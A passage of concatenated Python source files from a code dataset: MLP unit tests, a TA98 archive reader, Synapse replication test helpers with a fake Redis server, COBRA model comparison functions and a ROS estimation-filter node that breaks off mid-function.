test_numpy([np.zeros(shape=(9, 1)) for _ in range(5)], neural1._network)
# Test constructor for iterable
neural2 = spl.MLP(randomlayers).fit(self.data, self.target)
test_numpy([np.zeros(shape=(value, 1)) for value in randomlayers], neural2._network)
# Test constructor with integer
neural3 = spl.MLP(9).fit(self.data, self.target)
test_numpy([np.zeros(shape=(9, 1)) for _ in range(9)], neural3._network)
# Test constructor with package
neural4 = spl.MLP(*randomlayers).fit(self.data, self.target)
test_numpy([np.zeros(shape=(value, 1)) for value in randomlayers], neural4._network)
# Testing wrong constructors
with self.assertRaises(TypeError):
wronglayers = np.random.rand(3)
print("Shape wronglayers: {0}".format(wronglayers.shape))
# Test constructor with float
spl.MLP(3.7)
# Test constructor with string
spl.MLP("marcelinho")
# Test constructor with random type
spl.MLP(int)
# Test constructor with array of floats
spl.MLP(wronglayers)
# Test constructor with sequence of floats
spl.MLP(*wronglayers)
def test_fitting(self):
ml = spl.MLP([2])
ml.fit(self.data, self.target)
for layer in ml._network:
print(layer)
spl.MLP(2, 1).fit(self.data, self.target)
def test_foward(self):
weight1 = np.array([[0.3, 0.8, 0.7],
[0.5, 0.6, 0.2]])
weight2 = np.array([[0.1, 0.4, 0.9],
[0.5, 0.3, 0.6]])
first = np.array([[0.0, 0.0]])
target = np.array([[0.0, 0.0]])
testinput = np.array([0.0, 0.0])
neural = spl.MLP(2, 1).fit(first, target)
neural._weights[0] = weight1
neural._weights[1] = weight2
testtarget = np.array([0.33, 0.425]).reshape(2, 1)
tst.assert_almost_equal(neural._forward(testinput), testtarget, decimal=2)
def test_predict(self):
neural = spl.MLP(2, 1).fit(self.data, self.target)
result = neural.predict(np.array([[1, 1]]))
print("prediction:", result)
def test_back(self):
weight1 = np.array([[0.3, 0.8, 0.7],
[0.5, 0.6, 0.2]])
weight2 = np.array([[0.1, 0.4, 0.9],
[0.5, 0.3, 0.6]])
first = np.array([[0.0, 0.0]])
target = np.array([[0.0, 0.0]])
testinput = np.array([0.0, 0.0])
expected = np.array([0.0, 0.0])
# Results from classroom assignment
nweights = [np.array([[0.3, 0.8, 0.71],
[0.5, 0.6, 0.21]]),
np.array([[0.08, 0.38, 0.93],
[0.48, 0.28, 0.65]])]
neural = spl.MLP(2, 1).fit(first, target)
neural._weights[0] = weight1
neural._weights[1] = weight2
neural._forward(testinput)
neural._backprop(expected)
for old, new in zip(neural._weights, nweights):
tst.assert_almost_equal(old, new, decimal=2)
def test_describe(self):
neural = spl.MLP(2, 1).fit(self.data, self.target)
neural.describe()
def test_batch(self):
pass
def test_iris(self):
pass | StarcoderdataPython |
3385027 | import sys
import zipfile
import os, os.path
class TA98ScrapedData(object):
def __init__(self, scraped_zipfile):
self.scraped_zipfile = scraped_zipfile
def __enter__(self):
self.zfile = zipfile.ZipFile(self.scraped_zipfile)
self.ids = ['A'+y for y in
(x[3:].split(' ')[0] for x in self.zfile.namelist() if x.startswith('en')) if y]
self.ids.remove('A02.5.00.000') # bug: this isn't the latin version
return self
def get_html(self, id, lang='en'):
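        # File names inside the archive omit the leading 'A' of the TA98 id.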
idx = id[1:]
if lang == 'en':
filename = f'en/{idx} Entity TA98 EN.htm'
elif lang == 'la':
filename = f'la/{idx} Latin TA98.htm'
else:
raise ValueError("en or la")
ret = None
with self.zfile.open(filename, 'r') as fp:
ret = fp.read()
return ret
def items_en(self):
for i in self.ids:
yield (i, self.get_html(i, 'en'))
def items_la(self):
for i in self.ids:
yield (i, self.get_html(i, 'la'))
def keys(self):
yield from self.ids
def __exit__(self, type, value, traceback):
self.zfile.close()
if __name__ == '__main__':
def main(scraped_zipfile):
        with TA98ScrapedData(scraped_zipfile) as sinfo:
list(sinfo.items_la())
list(sinfo.items_en())
scraped_zipfile = sys.argv[1]
main(scraped_zipfile) | StarcoderdataPython |
67315 | <gh_stars>0
# Copyright 2019 New Vector Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from typing import Any, Dict, List, Optional, Tuple
from twisted.internet.address import IPv4Address
from twisted.internet.protocol import Protocol
from twisted.web.resource import Resource
from synapse.app.generic_worker import GenericWorkerServer
from synapse.http.site import SynapseRequest, SynapseSite
from synapse.replication.http import ReplicationRestResource
from synapse.replication.tcp.client import ReplicationDataHandler
from synapse.replication.tcp.handler import ReplicationCommandHandler
from synapse.replication.tcp.protocol import ClientReplicationStreamProtocol
from synapse.replication.tcp.resource import (
ReplicationStreamProtocolFactory,
ServerReplicationStreamProtocol,
)
from synapse.server import HomeServer
from tests import unittest
from tests.server import FakeTransport
try:
import hiredis
except ImportError:
hiredis = None # type: ignore
logger = logging.getLogger(__name__)
class BaseStreamTestCase(unittest.HomeserverTestCase):
"""Base class for tests of the replication streams"""
# hiredis is an optional dependency so we don't want to require it for running
# the tests.
if not hiredis:
skip = "Requires hiredis"
def prepare(self, reactor, clock, hs):
# build a replication server
server_factory = ReplicationStreamProtocolFactory(hs)
self.streamer = hs.get_replication_streamer()
self.server: ServerReplicationStreamProtocol = server_factory.buildProtocol(
IPv4Address("TCP", "127.0.0.1", 0)
)
# Make a new HomeServer object for the worker
self.reactor.lookups["testserv"] = "172.16.31.10"
self.worker_hs = self.setup_test_homeserver(
federation_http_client=None,
homeserver_to_use=GenericWorkerServer,
config=self._get_worker_hs_config(),
reactor=self.reactor,
)
        # Since we use SQLite in-memory databases we need to make sure the
        # database objects are the same.
self.worker_hs.get_datastores().main.db_pool = hs.get_datastores().main.db_pool
# Normally we'd pass in the handler to `setup_test_homeserver`, which would
# eventually hit "Install @cache_in_self attributes" in tests/utils.py.
# Unfortunately our handler wants a reference to the homeserver. That leaves
# us with a chicken-and-egg problem.
        # We can work around this: create the homeserver first, create the handler
# and bodge it in after the fact. The bodging requires us to know the
# dirty details of how `cache_in_self` works. We politely ask mypy to
# ignore our dirty dealings.
self.test_handler = self._build_replication_data_handler()
self.worker_hs._replication_data_handler = self.test_handler # type: ignore[attr-defined]
repl_handler = ReplicationCommandHandler(self.worker_hs)
self.client = ClientReplicationStreamProtocol(
self.worker_hs,
"client",
"test",
clock,
repl_handler,
)
self._client_transport = None
self._server_transport = None
def create_resource_dict(self) -> Dict[str, Resource]:
d = super().create_resource_dict()
d["/_synapse/replication"] = ReplicationRestResource(self.hs)
return d
def _get_worker_hs_config(self) -> dict:
config = self.default_config()
config["worker_app"] = "synapse.app.generic_worker"
config["worker_replication_host"] = "testserv"
config["worker_replication_http_port"] = "8765"
return config
def _build_replication_data_handler(self):
return TestReplicationDataHandler(self.worker_hs)
def reconnect(self):
if self._client_transport:
self.client.close()
if self._server_transport:
self.server.close()
self._client_transport = FakeTransport(self.server, self.reactor)
self.client.makeConnection(self._client_transport)
self._server_transport = FakeTransport(self.client, self.reactor)
self.server.makeConnection(self._server_transport)
def disconnect(self):
if self._client_transport:
self._client_transport = None
self.client.close()
if self._server_transport:
self._server_transport = None
self.server.close()
def replicate(self):
"""Tell the master side of replication that something has happened, and then
wait for the replication to occur.
"""
self.streamer.on_notifier_poke()
self.pump(0.1)
def handle_http_replication_attempt(self) -> SynapseRequest:
"""Asserts that a connection attempt was made to the master HS on the
HTTP replication port, then proxies it to the master HS object to be
handled.
Returns:
The request object received by master HS.
"""
# We should have an outbound connection attempt.
clients = self.reactor.tcpClients
self.assertEqual(len(clients), 1)
(host, port, client_factory, _timeout, _bindAddress) = clients.pop(0)
self.assertEqual(host, "1.2.3.4")
self.assertEqual(port, 8765)
# Set up client side protocol
client_protocol = client_factory.buildProtocol(None)
# Set up the server side protocol
channel = self.site.buildProtocol(None)
# hook into the channel's request factory so that we can keep a record
# of the requests
requests: List[SynapseRequest] = []
real_request_factory = channel.requestFactory
def request_factory(*args, **kwargs):
request = real_request_factory(*args, **kwargs)
requests.append(request)
return request
channel.requestFactory = request_factory
# Connect client to server and vice versa.
client_to_server_transport = FakeTransport(
channel, self.reactor, client_protocol
)
client_protocol.makeConnection(client_to_server_transport)
server_to_client_transport = FakeTransport(
client_protocol, self.reactor, channel
)
channel.makeConnection(server_to_client_transport)
# The request will now be processed by `self.site` and the response
# streamed back.
self.reactor.advance(0)
# We tear down the connection so it doesn't get reused without our
# knowledge.
server_to_client_transport.loseConnection()
client_to_server_transport.loseConnection()
# there should have been exactly one request
self.assertEqual(len(requests), 1)
return requests[0]
def assert_request_is_get_repl_stream_updates(
self, request: SynapseRequest, stream_name: str
):
"""Asserts that the given request is a HTTP replication request for
fetching updates for given stream.
"""
path: bytes = request.path # type: ignore
self.assertRegex(
path,
br"^/_synapse/replication/get_repl_stream_updates/%s/[^/]+$"
% (stream_name.encode("ascii"),),
)
self.assertEqual(request.method, b"GET")
class BaseMultiWorkerStreamTestCase(unittest.HomeserverTestCase):
"""Base class for tests running multiple workers.
Automatically handle HTTP replication requests from workers to master,
unlike `BaseStreamTestCase`.
"""
def setUp(self):
super().setUp()
# build a replication server
self.server_factory = ReplicationStreamProtocolFactory(self.hs)
self.streamer = self.hs.get_replication_streamer()
# Fake in memory Redis server that servers can connect to.
self._redis_server = FakeRedisPubSubServer()
# We may have an attempt to connect to redis for the external cache already.
self.connect_any_redis_attempts()
store = self.hs.get_datastores().main
self.database_pool = store.db_pool
self.reactor.lookups["testserv"] = "172.16.31.10"
self.reactor.lookups["localhost"] = "127.0.0.1"
# A map from a HS instance to the associated HTTP Site to use for
# handling inbound HTTP requests to that instance.
self._hs_to_site = {self.hs: self.site}
if self.hs.config.redis.redis_enabled:
# Handle attempts to connect to fake redis server.
self.reactor.add_tcp_client_callback(
"localhost",
6379,
self.connect_any_redis_attempts,
)
self.hs.get_replication_command_handler().start_replication(self.hs)
# When we see a connection attempt to the master replication listener we
        # automatically set up the connection. This is so that tests don't have
        # to set it up explicitly each time (plus sometimes it is impossible to
        # write the handling explicitly in the tests).
#
# Register the master replication listener:
self.reactor.add_tcp_client_callback(
"1.2.3.4",
8765,
lambda: self._handle_http_replication_attempt(self.hs, 8765),
)
def create_test_resource(self):
"""Overrides `HomeserverTestCase.create_test_resource`."""
# We override this so that it automatically registers all the HTTP
# replication servlets, without having to explicitly do that in all
        # subclasses.
resource = ReplicationRestResource(self.hs)
for servlet in self.servlets:
servlet(self.hs, resource)
return resource
def make_worker_hs(
self, worker_app: str, extra_config: Optional[dict] = None, **kwargs
) -> HomeServer:
"""Make a new worker HS instance, correctly connecting replcation
stream to the master HS.
Args:
worker_app: Type of worker, e.g. `synapse.app.federation_sender`.
            extra_config: Any extra config to use for this instance.
**kwargs: Options that get passed to `self.setup_test_homeserver`,
useful to e.g. pass some mocks for things like `federation_http_client`
Returns:
The new worker HomeServer instance.
"""
config = self._get_worker_hs_config()
config["worker_app"] = worker_app
config.update(extra_config or {})
worker_hs = self.setup_test_homeserver(
homeserver_to_use=GenericWorkerServer,
config=config,
reactor=self.reactor,
**kwargs,
)
# If the instance is in the `instance_map` config then workers may try
# and send HTTP requests to it, so we register it with
# `_handle_http_replication_attempt` like we do with the master HS.
instance_name = worker_hs.get_instance_name()
instance_loc = worker_hs.config.worker.instance_map.get(instance_name)
if instance_loc:
# Ensure the host is one that has a fake DNS entry.
if instance_loc.host not in self.reactor.lookups:
raise Exception(
"Host does not have an IP for instance_map[%r].host = %r"
% (
instance_name,
instance_loc.host,
)
)
# Copy the port into a new, non-Optional variable so mypy knows we're
# not going to reset `instance_loc` to `None` under its feet. See
# https://mypy.readthedocs.io/en/latest/common_issues.html#narrowing-and-inner-functions
port = instance_loc.port
self.reactor.add_tcp_client_callback(
self.reactor.lookups[instance_loc.host],
instance_loc.port,
lambda: self._handle_http_replication_attempt(worker_hs, port),
)
store = worker_hs.get_datastores().main
store.db_pool._db_pool = self.database_pool._db_pool
# Set up TCP replication between master and the new worker if we don't
# have Redis support enabled.
if not worker_hs.config.redis.redis_enabled:
repl_handler = ReplicationCommandHandler(worker_hs)
client = ClientReplicationStreamProtocol(
worker_hs,
"client",
"test",
self.clock,
repl_handler,
)
server = self.server_factory.buildProtocol(
IPv4Address("TCP", "127.0.0.1", 0)
)
client_transport = FakeTransport(server, self.reactor)
client.makeConnection(client_transport)
server_transport = FakeTransport(client, self.reactor)
server.makeConnection(server_transport)
# Set up a resource for the worker
resource = ReplicationRestResource(worker_hs)
for servlet in self.servlets:
servlet(worker_hs, resource)
self._hs_to_site[worker_hs] = SynapseSite(
logger_name="synapse.access.http.fake",
site_tag="{}-{}".format(
worker_hs.config.server.server_name, worker_hs.get_instance_name()
),
config=worker_hs.config.server.listeners[0],
resource=resource,
server_version_string="1",
max_request_body_size=4096,
reactor=self.reactor,
)
if worker_hs.config.redis.redis_enabled:
worker_hs.get_replication_command_handler().start_replication(worker_hs)
return worker_hs
def _get_worker_hs_config(self) -> dict:
config = self.default_config()
config["worker_replication_host"] = "testserv"
config["worker_replication_http_port"] = "8765"
return config
def replicate(self):
"""Tell the master side of replication that something has happened, and then
wait for the replication to occur.
"""
self.streamer.on_notifier_poke()
self.pump()
def _handle_http_replication_attempt(self, hs, repl_port):
"""Handles a connection attempt to the given HS replication HTTP
listener on the given port.
"""
# We should have at least one outbound connection attempt, where the
        # last is one to the HTTP replication IP/port.
clients = self.reactor.tcpClients
self.assertGreaterEqual(len(clients), 1)
(host, port, client_factory, _timeout, _bindAddress) = clients.pop()
self.assertEqual(host, "1.2.3.4")
self.assertEqual(port, repl_port)
# Set up client side protocol
client_protocol = client_factory.buildProtocol(None)
# Set up the server side protocol
channel = self._hs_to_site[hs].buildProtocol(None)
# Connect client to server and vice versa.
client_to_server_transport = FakeTransport(
channel, self.reactor, client_protocol
)
client_protocol.makeConnection(client_to_server_transport)
server_to_client_transport = FakeTransport(
client_protocol, self.reactor, channel
)
channel.makeConnection(server_to_client_transport)
# Note: at this point we've wired everything up, but we need to return
# before the data starts flowing over the connections as this is called
        # inside `connectTCP` before the connection has been passed back to the
# code that requested the TCP connection.
def connect_any_redis_attempts(self):
"""If redis is enabled we need to deal with workers connecting to a
redis server. We don't want to use a real Redis server so we use a
fake one.
"""
clients = self.reactor.tcpClients
while clients:
(host, port, client_factory, _timeout, _bindAddress) = clients.pop(0)
self.assertEqual(host, "localhost")
self.assertEqual(port, 6379)
client_protocol = client_factory.buildProtocol(None)
server_protocol = self._redis_server.buildProtocol(None)
client_to_server_transport = FakeTransport(
server_protocol, self.reactor, client_protocol
)
client_protocol.makeConnection(client_to_server_transport)
server_to_client_transport = FakeTransport(
client_protocol, self.reactor, server_protocol
)
server_protocol.makeConnection(server_to_client_transport)
class TestReplicationDataHandler(ReplicationDataHandler):
"""Drop-in for ReplicationDataHandler which just collects RDATA rows"""
def __init__(self, hs: HomeServer):
super().__init__(hs)
# list of received (stream_name, token, row) tuples
self.received_rdata_rows: List[Tuple[str, int, Any]] = []
async def on_rdata(self, stream_name, instance_name, token, rows):
await super().on_rdata(stream_name, instance_name, token, rows)
for r in rows:
self.received_rdata_rows.append((stream_name, token, r))
class FakeRedisPubSubServer:
"""A fake Redis server for pub/sub."""
def __init__(self):
self._subscribers = set()
def add_subscriber(self, conn):
"""A connection has called SUBSCRIBE"""
self._subscribers.add(conn)
def remove_subscriber(self, conn):
"""A connection has called UNSUBSCRIBE"""
self._subscribers.discard(conn)
def publish(self, conn, channel, msg) -> int:
"""A connection want to publish a message to subscribers."""
for sub in self._subscribers:
sub.send(["message", channel, msg])
return len(self._subscribers)
def buildProtocol(self, addr):
return FakeRedisPubSubProtocol(self)
class FakeRedisPubSubProtocol(Protocol):
"""A connection from a client talking to the fake Redis server."""
transport: Optional[FakeTransport] = None
def __init__(self, server: FakeRedisPubSubServer):
self._server = server
self._reader = hiredis.Reader()
def dataReceived(self, data):
self._reader.feed(data)
# We might get multiple messages in one packet.
while True:
msg = self._reader.gets()
if msg is False:
# No more messages.
return
if not isinstance(msg, list):
# Inbound commands should always be a list
raise Exception("Expected redis list")
self.handle_command(msg[0], *msg[1:])
def handle_command(self, command, *args):
"""Received a Redis command from the client."""
# We currently only support pub/sub.
if command == b"PUBLISH":
channel, message = args
num_subscribers = self._server.publish(self, channel, message)
self.send(num_subscribers)
elif command == b"SUBSCRIBE":
(channel,) = args
self._server.add_subscriber(self)
self.send(["subscribe", channel, 1])
# Since we use SET/GET to cache things we can safely no-op them.
elif command == b"SET":
self.send("OK")
elif command == b"GET":
self.send(None)
else:
raise Exception("Unknown command")
def send(self, msg):
"""Send a message back to the client."""
assert self.transport is not None
raw = self.encode(msg).encode("utf-8")
self.transport.write(raw)
self.transport.flush()
def encode(self, obj):
"""Encode an object to its Redis format.
Supports: strings/bytes, integers and list/tuples.
"""
if isinstance(obj, bytes):
# We assume bytes are just unicode strings.
obj = obj.decode("utf-8")
if obj is None:
return "$-1\r\n"
if isinstance(obj, str):
return f"${len(obj)}\r\n{obj}\r\n"
if isinstance(obj, int):
return f":{obj}\r\n"
if isinstance(obj, (list, tuple)):
items = "".join(self.encode(a) for a in obj)
return f"*{len(obj)}\r\n{items}"
raise Exception("Unrecognized type for encoding redis: %r: %r", type(obj), obj)
def connectionLost(self, reason):
self._server.remove_subscriber(self)
| StarcoderdataPython |
11156 |
def compareMetaboliteDicts(d1, d2):
sorted_d1_keys = sorted(d1.keys())
sorted_d2_keys = sorted(d2.keys())
for i in range(len(sorted_d1_keys)):
if not compareMetabolites(sorted_d1_keys[i], sorted_d2_keys[i], naive=True):
return False
elif not d1[sorted_d1_keys[i]] == d2[sorted_d2_keys[i]]:
return False
    else:
        # for-else: only reached when every key/value pair matched
        return True
def compareMetabolites(met1, met2, naive=False):
if isinstance(met1, set):
return compareReactions(list(met1), list(met2), naive)
if isinstance(met1, list):
if not isinstance(met2, list):
return False
elif len(met1) != len(met2):
return False
else:
for i in range(len(met1)):
if not compareMetabolites(met1[i], met2[i], naive):
return False
else:
return True
else:
if not True:
#can never be entered
pass
elif not met1._bound == met2._bound:
return False
elif not met1._constraint_sense == met2._constraint_sense:
return False
#elif not met1.annotation == met2.annotation:
# return False
elif not met1.charge == met2.charge:
return False
elif not met1.compartment == met2.compartment:
return False
elif not met1.name == met2.name:
return False
elif not met1.compartment == met2.compartment:
return False
#elif not met1.notes == met2.notes:
# return False
elif not naive:
if not compareReactions(met1._reaction, met2._reaction, naive=True):
return False
elif not compareModels(met1._model, met2._model, naive=True):
return False
else:
return True
else:
return True
def compareReactions(r1, r2, naive=False):
if isinstance(r1, set):
return compareReactions(list(r1), list(r2), naive)
if isinstance(r1, list):
if not isinstance(r2, list):
return False
elif len(r1) != len(r2):
return False
else:
for i in range(len(r1)):
if not compareReactions(r1[i], r2[i],naive):
return False
else:
return True
else:
if not True:
#can never be entered
pass
#elif not r1._compartments == r2._compartments:
# return False
#elif not r1._forward_variable == r2._forward_variable:
# return False
elif not r1._gene_reaction_rule == r2._gene_reaction_rule:
return False
elif not r1._id == r2._id:
return False
elif not r1._lower_bound == r2._lower_bound:
return False
#elif not r1._model == r2._model:
# return False
#elif not r1._reverse_variable == r2._reverse_variable:
# return False
elif not r1._upper_bound == r2._upper_bound:
return False
#elif not r1.annotation == r2.annotation:
# return False
elif not r1.name== r2.name:
return False
#elif not r1.notes == r2.notes:
# return False
elif not r1.subsystem == r2.subsystem:
return False
elif not r1.variable_kind == r2.variable_kind:
return False
elif not naive:
if not compareMetaboliteDicts(r1._metabolites, r2._metabolites):
return False
elif not compareGenes(r1._genes,r2._genes, naive=True):
return False
else:
return True
else:
return True
def compareGenes(g1, g2, naive=False):
if isinstance(g1, set):
return compareGenes(list(g1), list(g2), naive)
if isinstance(g1, list):
if not isinstance(g2, list):
return False
elif len(g1) != len(g2):
return False
else:
for i in range(len(g1)):
if not compareGenes(g1[i], g2[i], naive):
return False
else:
return True
else:
if not True:
#can never be entered
pass
elif not g1._functional == g2._functional:
return False
elif not g1._id == g2._id:
return False
#elif not g1._model == g2._model:
# return False
elif not g1.annotation == g2.annotation:
return False
elif not g1.name == g2.name:
return False
#elif not g1.notes == g2.notes:
# return False
elif not naive:
if not compareReactions(g1._reaction,g2._reaction, naive=True):
return False
else:
return True
else:
return True
def compareModels(m1, m2, naive=False):
if not True:
#can never be entered
pass
#elif not m1._compartments == m2._compartments:
# return False
#elif not m1._contexts == m2._contexts:
# return False
#elif not m1._solver == m2._solver:
# return False
elif not m1._id == m2._id:
return False
#elif not m1._trimmed == m2.trimmed:
# return False
#elif not m1._trimmed_genes == m2._trimmed_genes:
# return False
#elif not m1._trimmed_reactions == m2._trimmed_reactions:
# return False
#elif not m1.annotation == m2.annotation:
# return False
elif not m1.bounds == m2.bounds:
return False
elif not m1.name == m2.name:
return False
#elif not m1.notes == m2.notes:
# return False
#elif not m1.quadratic_component == m2.quadratic_component:
# return False
elif not naive:
if not compareGenes(m1.genes, m2.genes):
return False
elif not compareMetabolites(m1.metabolites, m2.metabolites):
return False
elif not compareReactions(m1.reactions,m2.reactions):
return False
else:
return True
else:
return True
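# Hedged usage sketch (illustrative; assumes the optional COBRApy test-model
# helper is available -- nothing below is part of the original module):
if __name__ == "__main__":
    try:
        from cobra.test import create_test_model
    except ImportError:
        create_test_model = None
    if create_test_model is not None:
        m1 = create_test_model("textbook")
        m2 = m1.copy()
        # An untouched copy should compare equal; a perturbed bound should not.
        print(compareModels(m1, m2))
        m2.reactions[0].lower_bound -= 1.0
        print(compareModels(m1, m2))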
| StarcoderdataPython |
102565 | #!/usr/bin/env python
from __future__ import division
"""@package etddf
ROS interface script for delta tiering filter
Filter operates in ENU
"""
from etddf.delta_tier import DeltaTier
import rospy
import threading
from minau.msg import ControlStatus
from etddf.msg import Measurement, MeasurementPackage, NetworkEstimate, AssetEstimate, EtddfStatistics, PositionVelocity
from etddf.srv import GetMeasurementPackage
import numpy as np
import tf
np.set_printoptions(suppress=True)
from copy import deepcopy
from std_msgs.msg import Header, Float64
from geometry_msgs.msg import PoseWithCovariance, Pose, Point, Quaternion, Twist, Vector3, TwistWithCovariance, PoseWithCovarianceStamped
from nav_msgs.msg import Odometry
from minau.msg import SonarTargetList, SonarTarget
from cuprint.cuprint import CUPrint
__author__ = "<NAME>"
__copyright__ = "Copyright 2020, COHRINT Lab"
__email__ = "<EMAIL>"
__status__ = "Development"
__license__ = "MIT"
__maintainer__ = "<NAME>"
__version__ = "3.0"
NUM_OWNSHIP_STATES = 6
class ETDDF_Node:
def __init__(self, my_name, \
update_rate, \
delta_tiers, \
asset2id, \
delta_codebook_table, \
buffer_size, \
meas_space_table, \
missed_meas_tolerance_table, \
x0,\
P0,\
Q,\
default_meas_variance,
use_control_input):
self.update_rate = update_rate
self.asset2id = asset2id
self.Q = Q
self.use_control_input = use_control_input
self.default_meas_variance = default_meas_variance
self.my_name = my_name
self.landmark_dict = rospy.get_param("~landmarks", {})
self.cuprint = CUPrint(rospy.get_name())
self.filter = DeltaTier(NUM_OWNSHIP_STATES, \
x0,\
P0,\
buffer_size,\
meas_space_table,\
missed_meas_tolerance_table, \
delta_codebook_table,\
delta_tiers,\
self.asset2id,\
my_name)
self.network_pub = rospy.Publisher("etddf/estimate/network", NetworkEstimate, queue_size=10)
self.statistics_pub = rospy.Publisher("etddf/statistics", EtddfStatistics, queue_size=10)
self.statistics = EtddfStatistics(0, rospy.get_rostime(), 0, 0, delta_tiers, [0 for _ in delta_tiers], 0.0, [], False)
self.asset_pub_dict = {}
for asset in self.asset2id.keys():
if "surface" in asset:
continue
self.asset_pub_dict[asset] = rospy.Publisher("etddf/estimate/" + asset, Odometry, queue_size=10)
self.update_seq = 0
self.last_depth_meas = None
rospy.sleep(rospy.Duration(1 / self.update_rate))
self.last_update_time = rospy.get_rostime() - rospy.Duration(1 / self.update_rate)
self.meas_lock = threading.Lock()
self.update_lock = threading.Lock()
self.last_orientation = None
self.red_asset_found = False
self.red_asset_names = rospy.get_param("~red_team_names")
# Depth Sensor
if rospy.get_param("~measurement_topics/depth") != "None":
rospy.Subscriber(rospy.get_param("~measurement_topics/depth"), Float64, self.depth_callback, queue_size=1)
# Modem & Measurement Packages
rospy.Subscriber("etddf/packages_in", MeasurementPackage, self.meas_pkg_callback, queue_size=1)
if self.use_control_input:
self.control_input = None
rospy.Subscriber("uuv_control/control_status", ControlStatus, self.control_status_callback, queue_size=1)
if rospy.get_param("~strapdown"):
rospy.Subscriber(rospy.get_param("~measurement_topics/imu_est"), Odometry, self.orientation_estimate_callback, queue_size=1)
rospy.wait_for_message(rospy.get_param("~measurement_topics/imu_est"), Odometry)
# IMU Covariance Intersection
if rospy.get_param("~strapdown") and rospy.get_param("~measurement_topics/imu_ci") != "None":
self.cuprint("Intersecting with strapdown")
self.intersection_pub = rospy.Publisher("strapdown/intersection_result", PositionVelocity, queue_size=1)
rospy.Subscriber(rospy.get_param("~measurement_topics/imu_ci"), PositionVelocity, self.nav_filter_callback, queue_size=1)
else:
self.cuprint("Not intersecting with strapdown filter")
rospy.Timer(rospy.Duration(1 / self.update_rate), self.no_nav_filter_callback)
# Sonar Subscription
if rospy.get_param("~measurement_topics/sonar") != "None":
rospy.Subscriber(rospy.get_param("~measurement_topics/sonar"), SonarTargetList, self.sonar_callback)
self.data_x, self.data_y = None, None
# rospy.Subscriber("pose_gt", Odometry, self.gps_callback, queue_size=1)
# Initialize Buffer Service
rospy.Service('etddf/get_measurement_package', GetMeasurementPackage, self.get_meas_pkg_callback)
self.cuprint("loaded")
def gps_callback(self, msg):
self.data_x = msg.pose.pose.position.x + np.random.normal(0, scale=0.05)
self.data_y = msg.pose.pose.position.y + np.random.normal(0, scale=0.05)
def orientation_estimate_callback(self, odom):
self.meas_lock.acquire()
self.last_orientation = odom.pose.pose.orientation
self.last_orientation_cov = np.array(odom.pose.covariance).reshape(6,6)
self.last_orientation_dot = odom.twist.twist.angular
self.last_orientation_dot_cov = np.array(odom.twist.covariance).reshape(6,6)
self.meas_lock.release()
def sonar_callback(self, sonar_list):
for target in sonar_list.targets:
# self.cuprint("Receiving sonar measurements")
if self.last_orientation is None: # No orientation, no linearization of the sonar measurement
# print("no ori")
return
if target.id == "detection":
continue
# self.cuprint("Receiving sonar data")
# Convert quaternions to Euler angles.
self.meas_lock.acquire()
(r, p, y) = tf.transformations.euler_from_quaternion([self.last_orientation.x, \
self.last_orientation.y, self.last_orientation.z, self.last_orientation.w])
self.meas_lock.release()
# y = (np.pi/180.0) * 8
bearing_world = y + target.bearing_rad
z = target.range_m * np.sin(target.elevation_rad)
xy_dist = target.range_m * np.cos(target.elevation_rad)
x = xy_dist * np.cos(bearing_world)
y = xy_dist * np.sin(bearing_world)
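            # Worked example (illustrative numbers only): a target 10 m away at
            # elevation 0 and bearing_world = pi/2 gives z = 0, xy_dist = 10,
            # x ~= 0 and y ~= 10 in the world frame used here.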
now = rospy.get_rostime()
sonar_x, sonar_y = None, None
if "landmark_" in target.id:
sonar_x = Measurement("sonar_x", now, self.my_name, "", x, self.default_meas_variance["sonar_x"], self.landmark_dict[target.id[len("landmark_"):]])
sonar_y = Measurement("sonar_y", now, self.my_name, "", y, self.default_meas_variance["sonar_x"], self.landmark_dict[target.id[len("landmark_"):]])
else:
sonar_x = Measurement("sonar_x", now, self.my_name, target.id, x, self.default_meas_variance["sonar_x"], [])
sonar_y = Measurement("sonar_y", now, self.my_name, target.id, y, self.default_meas_variance["sonar_y"], [])
if target.id in self.red_asset_names and not self.red_asset_found:
self.cuprint("Red Asset detected!")
self.red_asset_found = True
# sonar_z = Measurement("sonar_z", now, self.my_name, target.id, z, self.default_meas_variance["sonar_z"], []
self.filter.add_meas(sonar_x)
self.filter.add_meas(sonar_y)
# self.filter.add_meas(sonar_z)
# self.cuprint("meas added")
def publish_stats(self, last_update_time):
self.statistics.seq = self.update_seq
self.statistics.stamp = last_update_time
self.statistics.overflown, delta, buffer = self.filter.peek_buffer()
self.statistics.current_lowest_multiplier = delta
meas_name_list = [x.meas_type for x in buffer]
self.statistics.current_lowest_buffer = meas_name_list
self.statistics_pub.publish(self.statistics)
def no_nav_filter_callback(self, event):
t_now = rospy.get_rostime()
delta_t_ros = t_now - self.last_update_time
self.update_lock.acquire()
        ### Run Prediction ###
if self.use_control_input and self.control_input is not None:
self.filter.predict(self.control_input, self.Q, delta_t_ros.to_sec(), False)
else:
self.filter.predict(np.zeros((3,1)), self.Q, delta_t_ros.to_sec(), False)
### Run Correction ###
# Construct depth measurement
z_r = self.default_meas_variance["depth"]
z_data = self.last_depth_meas
if z_data != None:
z = Measurement("depth", t_now, self.my_name,"", z_data, z_r, [])
self.filter.add_meas(z)
self.last_depth_meas = None
# correction
self.filter.correct(t_now)
self.publish_estimates(t_now)
self.last_update_time = t_now
self.update_seq += 1
self.update_lock.release()
self.publish_stats(t_now)
def nav_filter_callback(self, pv_msg):
# Update at specified rate
t_now = rospy.get_rostime()
delta_t_ros = t_now - self.last_update_time
if delta_t_ros < rospy.Duration(1/self.update_rate):
return
self.update_lock.acquire()
### Run Prediction ###
if self.use_control_input and self.control_input is not None:
self.filter.predict(self.control_input, self.Q, delta_t_ros.to_sec(), False)
else:
self.filter.predict(np.zeros((3,1)), self.Q, delta_t_ros.to_sec(), False)
### Run Correction ###
# Construct depth measurement
z_r = self.default_meas_variance["depth"]
z_data = self.last_depth_meas
if z_data != None:
z = Measurement("depth", t_now, self.my_name,"", z_data, z_r, []) # Flip z data to transform enu -> NED
self.filter.add_meas(z)
self.last_depth_meas = None
if self.data_x != None:
x = Measurement("gps_x", t_now, self.my_name,"", self.data_x, 0.1, [])
self.filter.add_meas(x)
self.data_x = None
if self.data_y != None:
